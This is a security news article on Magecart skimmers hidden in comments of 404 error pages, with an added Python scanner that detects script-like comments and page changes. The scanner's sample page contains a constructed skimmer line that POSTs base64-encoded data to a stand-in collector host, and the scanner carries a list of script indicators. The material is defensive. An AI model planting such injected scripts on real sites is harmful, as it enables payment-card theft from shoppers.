How Cybercriminals Exploit 404 Pages to Steal Sensitive Information

The Evolving Tactics of Cybercriminal Groups Behind Magecart Attacks

An Unseen Technique to Hide Credit Card Skimming Code

Recently, the notorious cybercriminal groups responsible for the Magecart payment-card theft campaigns have employed a new technique to conceal their credit card skimming code. This technique has allowed them to evade detection for several weeks while infecting major e-commerce sites, including well-known brands in the food and retail industries. The technique involves hiding JavaScript code in a comment within a targeted site’s default 404 page. Alongside this, other pages on the site have been subtly modified to include a call to a nonexistent folder; the request triggers a 404 error, and the server responds with the modified error page that carries the hidden code.

Security researchers at Akamai, a content delivery network and cybersecurity company, have highlighted the sophistication and novelty of this concealment technique. It manipulates the default 404 error page of a targeted website, providing Magecart actors with numerous creative options for improved hiding and evasion. Roman Lvovsky, a security researcher at Akamai, explained that this technique allows the attacker’s script to retrieve the entire attack code contained within a specific placeholder in the comment.

Magecart Attacks and Their Tactics

Magecart attacks encompass a range of post-exploitation techniques used to skim credit card information and other user data from websites. These techniques involve obfuscated JavaScript, hijacking of forms, and malicious redirects. The complexity of modern websites, which heavily rely on third-party components, open-source Web frameworks, and code obfuscation, often allows embedded code to remain undetected. Cybercriminal groups can hide their malicious content by inserting it among other obfuscated code or compromising a third-party source of code or content.

In the case of the recent Magecart campaign titled “Silent Skimmer,” a Chinese-speaking threat group compromised web-facing applications to skim credit card numbers in the Asia-Pacific region, and later expanded their activities to North and Latin America. The payload of this campaign overlays a fake credit card form on top of the original form, tricking users into submitting their financial details.

Code Obfuscation and Overlays in Magecart Campaigns

The modification of default 404 pages is just one aspect of the Magecart campaign’s efforts to deliver their payload and maintain persistence. By using fake form overlays and redirect techniques, they are able to collect credit card details from targeted users. When a user submits data into the attacker’s fake form, an error is presented, the fake form is hidden, the original payment form is displayed, and the user is prompted to re-enter their payment details. Notably, the submission of the fake form triggers a network request to the attacker’s command-and-control server, carrying all the stolen personal and credit card information.

A 404 page is considered a first-party object: it resides on the same server as the home page rather than being loaded from a third-party service. This allows attackers to bypass certain security measures, such as Content Security Policy (CSP) headers, which are typically written to restrict third-party script sources rather than content served from the site’s own origin. However, while this technique makes the modification hard to discover, it is not necessarily stealthy. It can be considered noisy, since it involves a request for a nonexistent resource, which Magecart groups typically aim to avoid so as to reduce the chances of attracting unwanted attention.

Addressing the Magecart Problem Through PCI DSS

The Payment Card Industry (PCI) Security Standards Council has been striving to combat Magecart attacks through the latest version of its Data Security Standard (DSS). The updated DSS includes two enhanced security requirements aimed at protecting payment pages. Requirement 6 focuses on developing and maintaining secure systems and software to prevent unauthorized code injection, while Requirement 11 emphasizes regular testing of systems and networks to detect any changes.

The implementation of these requirements is particularly critical for online merchants, even those that outsource the storage, processing, and transmission of account data to payment service providers. Jeff Zitomer, a senior director at Human Security, a bot- and fraud-protection service, highlights the challenges posed by modern websites that source code from various external parties at runtime. This dynamic nature of sourcing code bypasses traditional security controls and provides attackers with the opportunity to exploit vulnerabilities through malicious script attacks. It is worth noting that while the current PCI-DSS 4.0 requirements are considered best practices, they will become mandatory in early 2025.

The Imperative for Robust Website Security

The recent Magecart attack technique highlights the need for robust website security measures. Traditional scanning tools often overlook code hidden within default 404 pages, as these pages were not typically targeted for inspection. Cybersecurity researchers emphasize the importance of incorporating comprehensive scanning techniques that can detect and analyze all aspects of a website’s code, including comments and error pages.
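The following is an added example of the kind of scanning the paragraph above (and the description of the hidden-comment technique earlier in the article) calls for; it is not code from Akamai or any other party named here. It assumes the 404 page body has already been fetched; the sample page, the placeholder marker names and the collector hostname are all constructed for the demonstration and do not come from any real site. It extracts every HTML comment from the error page, scores each one for JavaScript-like tokens and for a pair of upper-case placeholder markers (the pattern a loader would use to locate an embedded blob), and also fingerprints the page so a change from the deploy-time baseline can be detected, in the spirit of the change-detection requirement discussed above.

```python
"""Scan an HTTP error page's HTML comments for script-like payloads.

Added example, not code from any party named in the article. Assumes the
page body has already been fetched; the sample page is constructed here.
"""
import hashlib
import re
from html.parser import HTMLParser

# Constructed 404 page: one benign theme comment and one comment that wraps
# script-like text between a pair of (made-up) placeholder markers.
SAMPLE_404_PAGE = """<!DOCTYPE html>
<html><head><title>404 Not Found</title>
<!-- generated by the site theme, v2.1 -->
</head><body>
<h1>Page not found</h1>
<!-- PAYLOAD_START
(function(){var f=document.createElement("div");
fetch("https://collector.invalid/c",{method:"POST",body:btoa(String(payload))});})();
PAYLOAD_END -->
<p>Sorry, that page does not exist.</p>
</body></html>"""

# Constructed clean page used as the deploy-time baseline.
BENIGN_404_PAGE = """<html><body><!-- theme footer v2.1 --><h1>Page not found</h1></body></html>"""

# Tokens that rarely belong in a legitimate HTML comment but are typical of
# inline JavaScript. Each distinct match adds one point to the comment's score.
SCRIPT_INDICATORS = (
    r"function\s*\(", r"=>", r"\beval\(", r"\batob\(", r"\bbtoa\(", r"\bfetch\(",
    r"XMLHttpRequest", r"document\.(?:createElement|cookie|forms|write)",
    r"addEventListener\(", r"\.innerHTML\s*=",
)

# A placeholder pair: an upper-case marker token at the very start of the
# comment and another at its very end, bracketing whatever sits between them.
PLACEHOLDER_PAIR = re.compile(r"\A\s*([A-Z][A-Z0-9_]{3,})\b.*\b([A-Z][A-Z0-9_]{3,})\s*\Z", re.S)


class CommentCollector(HTMLParser):
    """Collects the text of every <!-- ... --> comment in the document."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data)


def extract_comments(html):
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return parser.comments


def score_comment(text):
    """Return (score, matched indicator patterns, has_placeholder) for one comment."""
    indicators = [pat for pat in SCRIPT_INDICATORS if re.search(pat, text)]
    has_placeholder = PLACEHOLDER_PAIR.match(text) is not None
    # Placeholder markers weigh more than any single token; very long
    # comments get one extra point because blobs are rarely short.
    score = len(indicators) + (2 if has_placeholder else 0) + (1 if len(text) > 200 else 0)
    return score, indicators, has_placeholder


def scan_error_page(html, threshold=2):
    """Flag comments whose score reaches the threshold; returns a list of findings."""
    findings = []
    for index, comment in enumerate(extract_comments(html)):
        score, indicators, has_placeholder = score_comment(comment)
        if score >= threshold:
            findings.append({
                "comment_index": index,
                "score": score,
                "indicators": indicators,
                "placeholder": has_placeholder,
                "excerpt": comment.strip()[:80],
            })
    return findings


def page_fingerprint(html):
    """SHA-256 of the body with whitespace runs collapsed, for change detection."""
    normalized = re.sub(r"\s+", " ", html).strip().encode("utf-8")
    return hashlib.sha256(normalized).hexdigest()


def error_page_changed(html, baseline_fingerprint):
    """True when the 404 page no longer matches the fingerprint recorded at deploy time."""
    return page_fingerprint(html) != baseline_fingerprint


if __name__ == "__main__":
    for finding in scan_error_page(SAMPLE_404_PAGE):
        print(finding)
```

The scoring is deliberately heuristic: a theme comment containing a single stray token scores 1 and is ignored, while a comment that both carries script tokens and is bracketed by marker words is flagged. In practice the scan should be run against every error page the server can produce (not only 404), and the baseline fingerprint should be re-recorded whenever the page is legitimately redeployed, so that an unexpected change is the alert rather than the noise.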

Furthermore, organizations must adopt the latest security standards and best practices, such as the PCI DSS 4.0, to protect sensitive user data. Implementing secure development and maintenance practices, regularly monitoring systems and networks, and ensuring the integrity of third-party code are essential steps in minimizing the risk of Magecart attacks and similar threats.

Ultimately, it is crucial for both businesses and individuals to prioritize cybersecurity and remain vigilant against evolving cybercrime tactics. Regularly updating systems, utilizing strong and unique passwords, employing multi-factor authentication, and being cautious of suspicious links and attachments are fundamental actions to mitigate risks. Additionally, staying informed about the latest security threats and seeking expert advice can help individuals and organizations better protect themselves in an increasingly interconnected and digital world.

<< photo by Siarhei Horbach >>
The image is for illustrative purposes only and does not depict the actual situation.